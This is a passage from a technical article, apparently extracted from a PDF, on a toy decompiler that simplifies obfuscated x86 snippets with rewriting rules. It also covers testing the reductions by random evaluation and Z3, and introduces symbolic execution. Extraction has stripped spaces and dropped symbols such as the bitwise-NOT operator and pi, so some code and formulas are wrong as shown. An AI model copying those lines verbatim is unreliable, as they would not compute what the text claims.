going to reduce ((((arg1 ^ 0x12345678) ^ 0xdeadbeef) ^ 0x12345678) ^ 0xdeadbeef)
reduction in reduce_XOR4() ((arg1 ^ 0x12345678) ^ 0xdeadbeef) -> (arg1 ^ 0xcc99e897)
reduction in reduce_XOR4() ((arg1 ^ 0xcc99e897) ^ 0x12345678) -> (arg1 ^ 0xdeadbeef)
reduction in reduce_XOR4() ((arg1 ^ 0xdeadbeef) ^ 0xdeadbeef) -> (arg1 ^ 0x0)
going to reduce (arg1 ^ 0x0)
reduction in reduce_op_0() (arg1 ^ 0x0) -> arg1
going to reduce arg1
result=arg1
Thispieceofcodecanbedeobfuscated(oroptimized)aswell:
; toggle last bit
mov rax, rdi
mov rbx, rax
mov rcx, rbx
mov rsi, rcx
xor rsi, 12345678h
xor rsi, 12345679h
mov rax, rsi
working out tests/t7_obf.s
going to reduce ((arg1 ^ 0x12345678) ^ 0x12345679)
reduction in reduce_XOR4() ((arg1 ^ 0x12345678) ^ 0x12345679) -> (arg1 ^ 1)
going to reduce (arg1 ^ 1)
result=(arg1 ^ 1)
Ialsousedaha!47superoptimizertofindweirdpieceofcodewhichdoesnothing.
Aha!issocalledsuperoptimizer,ittriesvariouspieceofcodesinbrute-forcemanner,inattempttofind
shortestpossiblealternativeforsomemathematicaloperation. Whilesanecompilerdevelopersusesuper-
optimizersforthistask,Itrieditinoppositeway,tofindoddestpiecesofcodeforsomesimpleoperations,
includingNOPoperation. Inpast,I’veusedittofindweirdalternativetoXORoperation( 5.7).
Sohereiswhat aha!canfindforNOP:
; do nothing (as found by aha)
mov rax, rdi
and rax, rax
or rax, rax
# X & X -> X
def reduce_AND3 (expr):
m=match (expr, create_binary_expr ("&", bind_expr ("X1"), bind_expr ("X2")))
if m!=None and match (m["X1"], m["X2"])!=None:
return dbg_print_reduced_expr("reduce_AND3", expr, m["X1"])
else:
return expr # no match
...
# X | X -> X
def reduce_OR1 (expr):
m=match (expr, create_binary_expr ("|", bind_expr ("X1"), bind_expr ("X2")))
if m!=None and match (m["X1"], m["X2"])!=None:
return dbg_print_reduced_expr("reduce_OR1", expr, m["X1"])
else:
return expr # no match
working out tests/t11_obf.s
going to reduce ((arg1 & arg1) | (arg1 & arg1))
reduction in reduce_AND3() (arg1 & arg1) -> arg1
reduction in reduce_AND3() (arg1 & arg1) -> arg1
reduction in reduce_OR1() (arg1 | arg1) -> arg1
going to reduce arg1
result=arg1
47http://www.hackersdelight.org/aha/aha.pdf
53
Thisisweirder:
; do nothing (as found by aha)
;Found a 5-operation program:
; neg r1,rx
; neg r2,rx
; neg r3,r1
; or r4,rx,2
; and r5,r4,r3
; Expr: ((x | 2) & -(-(x)))
mov rax, rdi
neg rax
neg rax
or rdi, 2
and rax, rdi
Rulesadded(Iused“NEG”stringtorepresentsignchangeandtobedifferentfromsubtractionoperation,
whichisjustminus(“-”)):
# (op(op X)) -> X, where both ops are NEG or NOT
def reduce_double_NEG_or_NOT (expr):
# try each:
for op in ["NEG", " "]:
m=match (expr, create_unary_expr (op, create_unary_expr (op, bind_expr("X"))))
if m!=None:
return dbg_print_reduced_expr ("reduce_double_NEG_or_NOT", expr, m["X"])
# default:
return expr # no match
...
# X & (X | ...) -> X
def reduce_AND2 (expr):
m=match (expr, create_binary_expr ("&", create_binary_expr ("|", bind_expr ("X1"), bind_expr ("REST")),
bind_expr ("X2")))
if m!=None and match (m["X1"], m["X2"])!=None:
return dbg_print_reduced_expr("reduce_AND2", expr, m["X1"])
else:
return expr # no match
going to reduce ((-(-arg1)) & (arg1 | 2))
reduction in reduce_double_NEG_or_NOT() (-(-arg1)) -> arg1
reduction in reduce_AND2() (arg1 & (arg1 | 2)) -> arg1
going to reduce arg1
result=arg1
Ialsoforced aha!tofindpieceofcodewhichadds2withnoaddition/subtractionoperationsallowed:
; arg1+2, without add/sub allowed, as found by aha:
;Found a 4-operation program:
; not r1,rx
; neg r2,r1
; not r3,r2
; neg r4,r3
; Expr: -( (-((x))))
mov rax, rdi
not rax
neg rax
not rax
neg rax
Rule:
# (- ( X)) -> X+1
def reduce_NEG_NOT (expr):
m=match (expr, create_unary_expr ("NEG", create_unary_expr (" ", bind_expr("X"))))
if m==None:
return expr # no match
return dbg_print_reduced_expr ("reduce_NEG_NOT", expr, create_binary_expr ("+", m["X"],create_val_expr(1)))
54
working out tests/add_by_not_neg.s
going to reduce (-( (-(arg1))))
reduction in reduce_NEG_NOT() (-( arg1)) -> (arg1 + 1)
reduction in reduce_NEG_NOT() (-( (arg1 + 1))) -> ((arg1 + 1) + 1)
reduction in reduce_ADD3() ((arg1 + 1) + 1) -> (arg1 + 2)
going to reduce (arg1 + 2)
result=(arg1 + 2)
This is artifact of two’s complement system of signed numbers representation. Same can be done for
subtraction(justswapNEGandNOToperations).
Nowlet’saddsomefakeluggagetoFahrenheit-to-Celsiusexample:
; celsius = 5 * (fahr-32) / 9
; fake luggage:
mov rbx, 12345h
mov rax, rdi
sub rax, 32
; fake luggage:
add rbx, rax
imul rax, 5
mov rbx, 9
idiv rbx
; fake luggage:
sub rdx, rax
It’snotaproblemforourdecompiler,becausethenoiseisleftinRDXregister,andnotusedatall:
working out tests/fahr_to_celsius_obf1.s
line=[mov rbx, 12345h]
rcx=arg4
rsi=arg2
rbx=0x12345
rdx=arg3
rdi=arg1
rax=initial_RAX
line=[mov rax, rdi]
rcx=arg4
rsi=arg2
rbx=0x12345
rdx=arg3
rdi=arg1
rax=arg1
line=[sub rax, 32]
rcx=arg4
rsi=arg2
rbx=0x12345
rdx=arg3
rdi=arg1
rax=(arg1 - 32)
line=[add rbx, rax]
rcx=arg4
rsi=arg2
rbx=(0x12345 + (arg1 - 32))
rdx=arg3
rdi=arg1
rax=(arg1 - 32)
line=[imul rax, 5]
rcx=arg4
rsi=arg2
rbx=(0x12345 + (arg1 - 32))
rdx=arg3
rdi=arg1
rax=((arg1 - 32) * 5)
line=[mov rbx, 9]
rcx=arg4
rsi=arg2
rbx=9
rdx=arg3
rdi=arg1
rax=((arg1 - 32) * 5)
55
line=[idiv rbx]
rcx=arg4
rsi=arg2
rbx=9
rdx=(((arg1 - 32) * 5) % 9)
rdi=arg1
rax=(((arg1 - 32) * 5) / 9)
line=[sub rdx, rax]
rcx=arg4
rsi=arg2
rbx=9
rdx=((((arg1 - 32) * 5) % 9) - (((arg1 - 32) * 5) / 9))
rdi=arg1
rax=(((arg1 - 32) * 5) / 9)
going to reduce (((arg1 - 32) * 5) / 9)
result=(((arg1 - 32) * 5) / 9)
Wecantrytopretendweaffecttheresultwiththenoise:
; celsius = 5 * (fahr-32) / 9
; fake luggage:
mov rbx, 12345h
mov rax, rdi
sub rax, 32
; fake luggage:
add rbx, rax
imul rax, 5
mov rbx, 9
idiv rbx
; fake luggage:
sub rdx, rax
mov rcx, rax
; OR result with garbage (result of fake luggage):
or rcx, rdx
; the following instruction shouldn't affect result:
and rax, rcx
...butinfact,it’sallreducedby reduce_AND2() functionwealreadysaw( 7.5):
working out tests/fahr_to_celsius_obf2.s
going to reduce ((((arg1 - 32) * 5) / 9) & ((((arg1 - 32) * 5) / 9) | ((((arg1 - 32) * 5) % 9) - (((arg1 - 32) *
5) / 9))))
reduction in reduce_AND2() ((((arg1 - 32) * 5) / 9) & ((((arg1 - 32) * 5) / 9) | ((((arg1 - 32) * 5) % 9) - (((
arg1 - 32) * 5)
/ 9)))) -> (((arg1 - 32) * 5) / 9)
going to reduce (((arg1 - 32) * 5) / 9)
result=(((arg1 - 32) * 5) / 9)
Wecanseethatdeobfuscationisinfactthesamethingasoptimizationusedincompilers.Wecantrythis
functioninGCC:
int f(int a)
{
return -( a);
};
OptimizingGCC5.4(x86)generatesthis:
f:
mov eax, DWORD PTR [esp+4]
add eax, 1
ret
GCChasitsownrewritingrules,someofwhichare,probably,closetowhatweusehere.
7.6 Tests
Despitesimplicityofthedecompiler,it’sstillerror-prone. Weneedtobesurethatoriginalexpressionand
reducedoneareequivalenttoeachother.
56
7.6.1 Evaluating expressions
Firstofall, wewouldjustevaluate(or run, orexecute)expressionwithrandomvaluesasarguments,and
thencompareresults.
Evaluator do arithmetical operations when possible, recursively. When any symbol is encountered, its
value(randomlygeneratedbefore)istakenfromatable.
un_ops={"NEG":operator.neg,
"":operator.invert}
bin_ops={">>":operator.rshift,
"<<":(lambda x, c: x<<(c&0x3f)), # operator.lshift should be here, but it doesn't handle too big counts
"&":operator.and_,
"|":operator.or_,
"^":operator.xor,
"+":operator.add,
"-":operator.sub,
"*":operator.mul,
"/":operator.div,
"%":operator.mod}
def eval_expr(e, symbols):
t=get_expr_type (e)
if t=="EXPR_SYMBOL":
return symbols[get_symbol(e)]
elif t=="EXPR_VALUE":
return get_val (e)
elif t=="EXPR_OP":
if is_unary_op (get_op (e)):
return un_ops[get_op(e)](eval_expr(get_op1(e), symbols))
else:
return bin_ops[get_op(e)](eval_expr(get_op1(e), symbols), eval_expr(get_op2(e), symbols))
else:
raise AssertionError
def do_selftest(old, new):
for n in range(100):
symbols={"arg1":random.getrandbits(64),
"arg2":random.getrandbits(64),
"arg3":random.getrandbits(64),
"arg4":random.getrandbits(64)}
old_result=eval_expr (old, symbols)&0xffffffffffffffff # signed->unsigned
new_result=eval_expr (new, symbols)&0xffffffffffffffff # signed->unsigned
if old_result!=new_result:
print "self-test failed"
print "initial expression: "+expr_to_string(old)
print "reduced expression: "+expr_to_string(new)
print "initial expression result: ", old_result
print "reduced expression result: ", new_result
exit(0)
In fact, this is very close to what LISP EVALfunction does, or even LISP interpreter. However, not all
symbolsareset.IftheexpressionisusinginitialvaluesfromRAXorRBX(towhichsymbols“initial_RAX”and
“initial_RBX”areassigned,decompilerwillstopwithexception,becausenorandomvaluesassignedtothese
registers,andthesesymbolsareabsentin symbolsdictionary.
Usingthistest,I’vesuddenlyfoundabughere(despitesimplicityofallthesereductionrules).Well,no-one
protectedfromeyestrain. Nevertheless,thetesthasaseriousproblem: somebugscanberevealedonlyif
oneofargumentsis 0,or 1,or 1. Maybethereareevenmorespecialcasesexists.
Mentionedabove aha!superoptimizertriesatleastthesevaluesasargumentswhiletesting: 1, 0, -1,
0x80000000, 0x7FFFFFFF, 0x80000001, 0x7FFFFFFE, 0x01234567, 0x89ABCDEF, -2, 2, -3, 3, -64, 64, -5,
-31415.
Still,youcannotbesure.
7.6.2 Using Z3 SMT-solver for testing
SoherewewilltryZ3SMT-solver. SMT-solvercan provethattwoexpressionsareequivalenttoeachother.
Forexample,withthehelpof aha!,I’vefoundanotherweirdpieceofcode,whichdoesnothing:
; do nothing (obfuscation)
;Found a 5-operation program:
57
; neg r1,rx
; neg r2,r1
; sub r3,r1,3
; sub r4,r3,r1
; sub r5,r4,r3
; Expr: (((-(x) - 3) - -(x)) - (-(x) - 3))
mov rax, rdi
neg rax
mov rbx, rax
; rbx=-x
mov rcx, rbx
sub rcx, 3
; rcx=-x-3
mov rax, rcx
sub rax, rbx
; rax=(-(x) - 3) - -(x)
sub rax, rcx
Usingtoydecompiler,I’vefoundthatthispieceisreducedto arg1expression:
working out tests/t5_obf.s
going to reduce ((((-arg1) - 3) - (-arg1)) - ((-arg1) - 3))
reduction in reduce_SUB2() ((-arg1) - 3) -> (-(arg1 + 3))
reduction in reduce_SUB5() ((-(arg1 + 3)) - (-arg1)) -> ((-(arg1 + 3)) + arg1)
reduction in reduce_SUB2() ((-arg1) - 3) -> (-(arg1 + 3))
reduction in reduce_ADD_SUB() (((-(arg1 + 3)) + arg1) - (-(arg1 + 3))) -> arg1
going to reduce arg1
result=arg1
Butisitcorrect? I’veaddedafunctionwhichcanoutputexpression(s)toSMTLIB-format,it’sassimpleas
afunctionwhichconvertsexpressiontostring.
AndthisisSMTLIB-fileforZ3:
(assert
(forall ((arg1 (_ BitVec 64)) (arg2 (_ BitVec 64)) (arg3 (_ BitVec 64)) (arg4 (_ BitVec 64)))
(=
(bvsub (bvsub (bvsub (bvneg arg1) #x0000000000000003) (bvneg arg1)) (bvsub (bvneg arg1) #
x0000000000000003))
arg1
)
)
)
(check-sat)
InplainEnglishterms,whatweaskingittobesure,that forallfour64-bitarguments,twoexpressionsare
equivalent(secondisjust arg1).
Thesyntaxmaybehardtounderstand,butinfact,thisisveryclosetoLISP,andarithmeticaloperations
arenamed“bvsub”,“bvadd”,etc,because“bv”standsfor bitvector.
Whilerunning,Z3shows“sat”,meaning“satisfiable”. Inotherwords,Z3couldn’tfindcounterexample
forthisexpression.
Infact,Icanrewritethisexpressioninthefollowingform: expr1!=expr2 ,andwewouldaskZ3tofindat
leastonesetofinputarguments,forwhichexpressionsarenotequaltoeachother:
(declare-const arg1 (_ BitVec 64))
(declare-const arg2 (_ BitVec 64))
(declare-const arg3 (_ BitVec 64))
(declare-const arg4 (_ BitVec 64))
(assert
(not
(=
(bvsub (bvsub (bvsub (bvneg arg1) #x0000000000000003) (bvneg arg1)) (bvsub (bvneg arg1) #
x0000000000000003))
arg1
)
)
)
(check-sat)
Z3says“unsat”,meaning,itcouldn’tfindanysuchcounterexample.Inotherwords,forallpossibleinput
arguments,resultsofthesetwoexpressionsarealwaysequaltoeachother.
58
Nevertheless,Z3isnotomnipotent. Itfailstoproveequivalenceofthecodewhichperformsdivisionby
multiplication. Firstofall,Iextendeditsobothsresultswillhavesizeof128bitinsteadof64:
(declare-const x (_ BitVec 64))
(assert
(forall ((x (_ BitVec 64)))
(=
((_ zero_extend 64) (bvudiv x (_ bv17 64)))
(bvlshr (bvmul ((_ zero_extend 64) x) #x0000000000000000f0f0f0f0f0f0f0f1) (_ bv68 128))
)
)
)
(check-sat)
(get-model)
(bv17isjust64-bitnumber17,etc. “bv”standsfor“bitvector”,asopposedtointegervalue.)
Z3workstoolongwithoutanyanswer,andIhadtointerruptit.
AsZ3developersmentioned,suchexpressionsarehardforZ3sofar: https://github.com/Z3Prover/
z3/issues/514 .
Still,divisionbymultiplicationcanbetestedusingpreviouslydescribedbrute-forcecheck.
7.7 My other implementations of toy decompiler
WhenImadeattempttowriteitinC++,ofcourse,nodeinexpressionwasrepresentedusingclass.Thereis
alsoimplementationinpureC48,nodeisrepresentedusingstructure.
MatchersinbothC++andCversionsdoesn’treturnanydictionary,butinstead, bind_value() functions
takespointertoavariablewhichwillcontainvalueaftersuccessfulmatching. bind_expr() takespointer
toapointer,whichwillpointstothepartofexpression,again,incaseofsuccess. ItookthisideafromLLVM.
HerearetwopiecesofcodefromLLVMsourcecodewithcoupleofreducingrules:
// (X >> A) << A -> X
Value *X;
if (match(Op0, m_Exact(m_Shr(m_Value(X), m_Specific(Op1)))))
return X;
(lib/Analysis/InstructionSimplify.cpp )
// (A | B) | C and A | (B | C) -> bswap if possible.
// (A >> B) | (C << D) and (A << B) | (B >> C) -> bswap if possible.
if (match(Op0, m_Or(m_Value(), m_Value())) ||
match(Op1, m_Or(m_Value(), m_Value())) ||
(match(Op0, m_LogicalShift(m_Value(), m_Value())) &&
match(Op1, m_LogicalShift(m_Value(), m_Value())))) {
if (Instruction *BSwap = MatchBSwap(I))
return BSwap;
(lib/Transforms/InstCombine/InstCombineAndOrXor.cpp )
Asyoucansee,mymatchertriestomimicLLVM.WhatIcall reductioniscalledfoldinginLLVM.Bothterms
arepopular.
IhavealsoablogpostaboutLLVMobfuscator,inwhichLLVMmatcherismentioned: https://yurichev.
com/blog/llvm/ .
PythonversionoftoydecompilerusesstringsinplacewhereenumeratedatatypeisusedinCversion
(likeOP_AND,OP_MUL,etc)andsymbolsusedinRacketversion49(like’OP_DIV,etc). Thismaybeseenas
inefficient,nevertheless,thankstostringsinterning,onlyaddressofstringsarecomparedinPythonversion,
notstringsasawhole. SostringsinPythoncanbeseenaspossiblereplacementforLISPsymbols.
7.7.1 Even simpler toy decompiler
KnowledgeofLISPmakesyouunderstandallthesethingsnaturally,withoutsignificanteffort.ButwhenIhad
noknowledgeofit,butstilltriedtomakeasimpletoydecompiler,Imadeitusingusualtextstringswhich
holdedexpressionsforeachregisters(andevenmemory).
SowhenMOVinstructioncopiesvaluefromoneregistertoanother,wejustcopystring.Whenarithmetical
instructionoccurred,wedostringconcatenation:
48https://github.com/dennis714/SAT_SMT_article/tree/master/toy_decompiler/files/C
49RacketisScheme(whichis,inturn,LISPdialect)dialect. https://github.com/dennis714/SAT_SMT_article/tree/master/toy_
decompiler/files/Racket
59
std::string registers[TOTAL];
...
// all 3 arguments are strings
switch (ins, op1, op2)
{
...
case ADD: registers[op1]="(" + registers[op1] + " + " + registers[op2] + ")";
break;
...
case MUL: registers[op1]="(" + registers[op1] + " / " + registers[op2] + ")";
break;
...
}
Nowyou’llhavelongexpressionsforeachregister,representedasstrings. Forreducingthem,youcan
useplainsimpleregularexpressionmatcher.
Forexample,fortherule (X*n)+(X*m) -> X*(n+m) ,youcanmatch(sub)stringusingthefollowingreg-
ularexpression:
((.*)*(.*))+((.*)*(.*))50. Ifthestringismatched,you’regetting4groups(orsubstrings). Youthen
justcompare1stand3rdusingstringcomparisonfunction,thenyoucheckifthe2ndand4tharenumbers,
youconvertthemtonumbers,sumthemandyoumakenewstring,consistingof1stgroupandsum,likethis:
(" + X + "*" + (int(n) + int(m)) + ") .
Itwasnaïve,clumsy,itwassourceofgreatembarrassment,butitworkedcorrectly.
7.8 Difference between toy decompiler and commercial-grade one
Perhaps,someone,whocurrentlyreadingthistext,mayrushintoextendingmysourcecode.Asanexercise,
Iwouldsay,thatthefirststepcouldbesupportofpartialregisters:i.e.,AL,AX,EAX.Thisistricky,butdoable.
Anothertaskmaybesupportof FPU51x86instructions( FPUstackmodelingisn’tabigdeal).
ThegapbetweentoydecompilerandacommercialdecompilerlikeHex-Raysisstillenormous. Several
trickyproblemsmustbesolved,atleastthese:
•Cdatatypes:arrays,structures,pointers,etc.Thisproblemisvirtuallynon-existentfor JVM52(Java,etc)
and.NETdecompilers,becausetypeinformationispresentinbinaryfiles.
•Basicblocks,C/C++statements.MikeVanEmmerikinhisthesis53showshowthiscanbetackledusing
SSAforms(whicharealsousedheavilyincompilers).
•Memorysupport,includinglocalstack. Keepinmindpointeraliasingproblem. Again,decompilersof
JVMand.NETfilesaresimplerhere.
7.9 Further reading
Thereareseveralinterestingopen-sourceattemptstobuilddecompiler. Bothsourcecodeandthesesare
interestingstudy.
•decompbyJimReuter54.
•DCCbyCristinaCifuentes55.
Itisinterestingthatthisdecompilersupportsonlyonetype( int).MaybethisisareasonwhyDCCdecom-
pilerproducessourcecodewith .Bextension? ReadmoreaboutBtypelesslanguage(Cpredecessor):
https://yurichev.com/blog/typeless/ .
50Thisregularexpressionstringhasn’tbeenproperlyescaped,forthereasonofeasierreadabilityandunderstanding.
51Floating-pointunit
52JavaVirtualMachine
53https://yurichev.com/mirrors/vanEmmerik_ssa.pdf
54http://www.program-transformation.org/Transform/DecompReadMe ,http://www.program-transformation.org/Transform/
DecompDecompiler
55http://www.program-transformation.org/Transform/DccDecompiler , thesis: https://yurichev.com/mirrors/DCC_
decompilation_thesis.pdf
60
•BoomerangbyMikeVanEmmerik,TrentWaddingtonetal56.
As I’ve said, LISP knowledge can help to understand this all much easier. Here is well-known micro-
interpreterofLISPbyPeterNorvig,alsowritteninPython: https://web.archive.org/web/20161116133448/
http://www.norvig.com/lispy.html ,https://web.archive.org/web/20160305172301/http://norvig.
com/lispy2.html .
7.10 The files
Pythonversionandtests: https://github.com/dennis714/SAT_SMT_article/tree/master/toy_decompiler/
files.
TherearealsoCandRacketversions,butoutdated.
Keepinmind—thisdecompilerisstillattoylevel,anditwastestedonlyontinytestfilessupplied.
8 Symbolic execution
8.1 Symbolic computation
Let’sfirststartwithsymboliccomputation57.
Somenumberscanonlyberepresentedinbinarysystemapproximately,like1
3and. Ifwecalculate1
33
step-by-step,wemayhavelossofsignificance. Wealsoknowthat sin(
2) = 1,butcalculatingthisexpression
inusualway,wecanalsohavesomenoiseinresult.Arbitrary-precisionarithmetic58isnotasolution,because
thesenumberscannotbestoredinmemoryasabinarynumberoffinitelength.
How we could tackle this problem? Humans reduce such expressions using paper and pencil without
anycalculations. Wecanmimichumanbehaviourprogrammaticallyifwewillstoreexpressionastreeand
symbolslike willbeconvertedintonumberattheverylaststep(s).
ThisiswhatWolframMathematica59does. Let’sstartitandtrythis:
In[]:= x + 2*8
Out[]= 16 + x
SinceMathematicahasnocluewhat xis,it’sleftasis,but 28canbereducedeasily,bothbyMathematica
andbyhumans,sothatiswhathasdone. Insomepointoftimeinfuture,Mathematica’susermayassign
somenumberto xandthen,Mathematicawillreducetheexpressionevenfurther.
Mathematica does this because it parses the expression and finds some known patterns. This is also
calledtermrewriting60. InplainEnglishlanguageitmaysoundslikethis: “ifthereisa +operatorbetween
twoknownnumbers,replacethissubexpressionbyacomputednumberwhichissumofthesetwonumbers,
ifpossible”. Justlikehumansdo.
Mathematicaalsohasruleslike“replace sin()by0”and“replace sin(
2)by1”,butasyoucansee, must
bepreservedassomekindofsymbolinsteadofanumber.
SoMathematicaleft xasunknownvalue. Thisis, infact, commonmistakebyMathematica’susers: a
smalltypoinaninputexpressionmayleadtoahugeirreducibleexpressionwiththetypoleft.
Anotherexample: Mathematicaleftthisdeliberatelywhilecomputingbinarylogarithm:
In[]:= Log[2, 36]
Out[]= Log[36]/Log[2]
Becauseithasahopethatatsomepointinfuture,thisexpressionwillbecomeasubexpressioninanother
expressionanditwillbereducednicelyattheveryend. Butifwereallyneedanumericalanswer,wecan
forceMathematicatocalculateit:
In[]:= Log[2, 36] // N
Out[]= 5.16993
Sometimesunresolvedvaluesaredesirable:
56http://boomerang.sourceforge.net/ ,http://www.program-transformation.org/Transform/MikeVanEmmerik ,thesis: https:
//yurichev.com/mirrors/vanEmmerik_ssa.pdf
57https://en.wikipedia.org/wiki/Symbolic_computation
58https://en.wikipedia.org/wiki/Arbitrary-precision_arithmetic
59Anotherwell-knownsymboliccomputationsystemare MaximaandSymPy
60https://en.wikipedia.org/wiki/Rewriting
61
In[]:= Union[{a, b, a, c}, {d, a, e, b}, {c, a}]
Out[]= {a, b, c, d, e}
Charactersintheexpressionarejustunresolvedsymbols61withnoconnectionstonumbersorotherex-
pressions,soMathematicaleftthem asis.
Anotherrealworldexampleissymbolicintegration62,i.e.,findingformulaforintegralbyrewritinginitial
expressionusingsomepredefinedrules. Mathematicaalsodoesit:
In[]:= Integrate[1/(x^5), x]
Out[]= -(1/(4 x^4))
Benefitsofsymboliccomputationareobvious:itisnotpronetolossofsignificance63andround-offerrors64,
butdrawbacksarealsoobvious: youneedtostoreexpressionin(possiblehuge)treeandprocessitmany
times. Termrewritingisalsoslow. Allthesethingsareextremelyclumsyincomparisontoafast FPU.
“Symboliccomputation”isopposedto“numericalcomputation”,thelastoneisjustprocessingnumbers
step-by-step,usingcalculator, CPUorFPU.
Sometaskcanbesolvedbetterbythefirstmethod,someothers–bythesecondone.
8.1.1 Rational data type
Some LISP implementations can store a number as a ratio/fraction65, i.e., placing two numbers in a cell
(which, inthiscase, iscalled atominLISPlingo). Forexample, youdivide1by3, andtheinterpreter, by
understandingthat1
3isanirreduciblefraction66,createsacellwith1and3numbers. Sometimeafter,you
maymultiplythiscellby6,andthemultiplicationfunctioninsideLISPinterpretermayreturnmuchbetter
result(2without noise).
Printingfunctionininterpretercanalsoprintsomethinglike 1 / 3insteadoffloatingpointnumber.
Thisissometimescalled“fractionalarithmetic”[seeDonaldE.Knuth, TheArtofComputingProgramming ,
3rded.,(1997),4.5.1,page330].
Thisisnotsymboliccomputationinanyway,butthisisslightlybetterthanstoringratios/fractionsasjust
floatingpointnumbers.
Drawbacksareclearlyvisible:youneedmorememorytostoreratioinsteadofanumber;andallarithmetic
functionsaremorecomplexandslower,becausetheymusthandlebothnumbersandratios.
Perhaps, becauseofdrawbacks, someprogramminglanguagesoffersseparate( rational)datatype, as
languagefeature,orsupportedbyalibrary67: Haskell,OCaml,Perl,Ruby,Python,Smalltalk,Java,Clojure,
C/C++68.
8.2 Symbolic execution
8.2.1 Swapping two values using XOR
Thereisawell-known(butcounterintuitive)algorithmforswappingtwovaluesintwovariablesusingXOR
operationwithoutuseofanyadditionalmemory/register:
X=X^Y
Y=Y^X
X=X^Y
Howitworks? Itwouldbebettertoconstructanexpressionateachstepofexecution.
#!/usr/bin/env python
class Expr:
def __init__(self,s):
self.s=s
def __str__(self):
61SymbollikeinLISP
62https://en.wikipedia.org/wiki/Symbolic_integration
63https://en.wikipedia.org/wiki/Loss_of_significance
64https://en.wikipedia.org/wiki/Round-off_error
65https://en.wikipedia.org/wiki/Rational_data_type
66https://en.wikipedia.org/wiki/Irreducible_fraction
67Moredetailedlist: https://en.wikipedia.org/wiki/Rational_data_type
68ByGNUMultiplePrecisionArithmeticLibrary
62
return self.s
def __xor__(self, other):
return Expr("(" + self.s + "^" + other.s + ")")
def XOR_swap(X, Y):
X=X^Y
Y=Y^X
X=X^Y
return X, Y
new_X, new_Y=XOR_swap(Expr("X"), Expr("Y"))
print "new_X", new_X
print "new_Y", new_Y
Itworks,becausePythonisdynamicalytyped PL,sothefunctiondoesn’tcarewhattooperateon,numer-
icalvalues,oronobjectsofExpr()class.
Hereisresult:
new_X ((X^Y)^(Y^(X^Y)))
new_Y (Y^(X^Y))
Youcanremovedoublevariablesinyourmind(sinceXORingbyavaluetwicewillresultinnothing). At
new_XwecandroptwoX-esandtwoY-es,andsingleYwillleft.Atnew_YwecandroptwoY-es,andsingleX
willleft.
8.2.2 Change endianness
Whatdoesthiscodedo?
mov eax, ecx
mov edx, ecx
shl edx, 16
and eax, 0000ff00H
or eax, edx
mov edx, ecx
and edx, 00ff0000H
shr ecx, 16
or edx, ecx
shl eax, 8
shr edx, 8
or eax, edx
Infact,manyreverseengineersplayshellgamealot,keepingtrackofwhatisstoredwhere,ateachpoint
oftime.
63
Figure8:HieronymusBosch–TheConjurer
Again,wecanbuildequivalentfunctionwhichcantakebothnumericalvariablesandExpr()objects. We
alsoextendExpr()classtosupportmanyarithmeticalandbooleanoperations. Also,Expr()methodswould
takebothExpr()objectsoninputandintegervalues.
#!/usr/bin/env python
class Expr:
def __init__(self,s):
self.s=s
def convert_to_Expr_if_int(self, n):
if isinstance(n, int):
return Expr(str(n))
if isinstance(n, Expr):
return n
raise AssertionError # unsupported type
def __str__(self):
return self.s
def __xor__(self, other):
return Expr("(" + self.s + "^" + self.convert_to_Expr_if_int(other).s + ")")
def __and__(self, other):
return Expr("(" + self.s + "&" + self.convert_to_Expr_if_int(other).s + ")")
def __or__(self, other):
return Expr("(" + self.s + "|" + self.convert_to_Expr_if_int(other).s + ")")
def __lshift__(self, other):
return Expr("(" + self.s + "<<" + self.convert_to_Expr_if_int(other).s + ")")
def __rshift__(self, other):
return Expr("(" + self.s + ">>" + self.convert_to_Expr_if_int(other).s + ")")
64
# change endianness
ecx=Expr("initial_ECX") # 1st argument
eax=ecx # mov eax, ecx
edx=ecx # mov edx, ecx
edx=edx<<16 # shl edx, 16
eax=eax&0xff00 # and eax, 0000ff00H
eax=eax|edx # or eax, edx
edx=ecx # mov edx, ecx
edx=edx&0x00ff0000 # and edx, 00ff0000H
ecx=ecx>>16 # shr ecx, 16
edx=edx|ecx # or edx, ecx
eax=eax<<8 # shl eax, 8
edx=edx>>8 # shr edx, 8
eax=eax|edx # or eax, edx
print eax
Irunit:
((((initial_ECX&65280)|(initial_ECX<<16))<<8)|(((initial_ECX&16711680)|(initial_ECX>>16))>>8))
Nowthisissomethingmorereadable,however,abitLISPyatfirstsight. Infact,thisisafunctionwhich
changeendiannessin32-bitword.
Bytheway,myToyDecompilercandothisjobaswell,butoperateson ASTinsteadofplainstrings: 7.
8.2.3 Fast Fourier transform
I’vefoundoneofthesmallestpossibleFFTimplementationson reddit:
#!/usr/bin/env python
from cmath import exp,pi
def FFT(X):
n = len(X)
w = exp(-2*pi*1j/n)
if n > 1:
X = FFT(X[::2]) + FFT(X[1::2])
for k in xrange(n/2):
xk = X[k]
X[k] = xk + w**k*X[k+n/2]
X[k+n/2] = xk - w**k*X[k+n/2]
return X
print FFT([1,2,3,4,5,6,7,8])
Justinteresting,whatvaluehaseachelementonoutput?
#!/usr/bin/env python
from cmath import exp,pi
class Expr:
def __init__(self,s):
self.s=s
def convert_to_Expr_if_int(self, n):
if isinstance(n, int):
return Expr(str(n))
if isinstance(n, Expr):
return n
raise AssertionError # unsupported type
def __str__(self):
return self.s
def __add__(self, other):
return Expr("(" + self.s + "+" + self.convert_to_Expr_if_int(other).s + ")")
def __sub__(self, other):
return Expr("(" + self.s + "-" + self.convert_to_Expr_if_int(other).s + ")")
def __mul__(self, other):
return Expr("(" + self.s + "*" + self.convert_to_Expr_if_int(other).s + ")")
def __pow__(self, other):
65
return Expr("(" + self.s + "**" + self.convert_to_Expr_if_int(other).s + ")")
def FFT(X):
n = len(X)
# cast complex value to string, and then to Expr
w = Expr(str(exp(-2*pi*1j/n)))
if n > 1:
X = FFT(X[::2]) + FFT(X[1::2])
for k in xrange(n/2):
xk = X[k]
X[k] = xk + w**k*X[k+n/2]
X[k+n/2] = xk - w**k*X[k+n/2]
return X
input=[Expr("input_%d" % i) for i in range(8)]
output=FFT(input)
for i in range(len(output)):
print i, ":", output[i]
FFT()functionleftalmostintact,theonlythingIadded: complexvalueisconvertedintostringandthen
Expr()objectisconstructed.
0 : (((input_0+(((-1-1.22464679915e-16j)**0)*input_4))+(((6.12323399574e-17-1j)**0)*(input_2+(((-1-1.22464679915
e-16j)**0)*input_6))))+(((0.707106781187-0.707106781187j)**0)*((input_1+(((-1-1.22464679915e-16j)**0)*
input_5))+(((6.12323399574e-17-1j)**0)*(input_3+(((-1-1.22464679915e-16j)**0)*input_7))))))
1 : (((input_0-(((-1-1.22464679915e-16j)**0)*input_4))+(((6.12323399574e-17-1j)**1)*(input_2-(((-1-1.22464679915
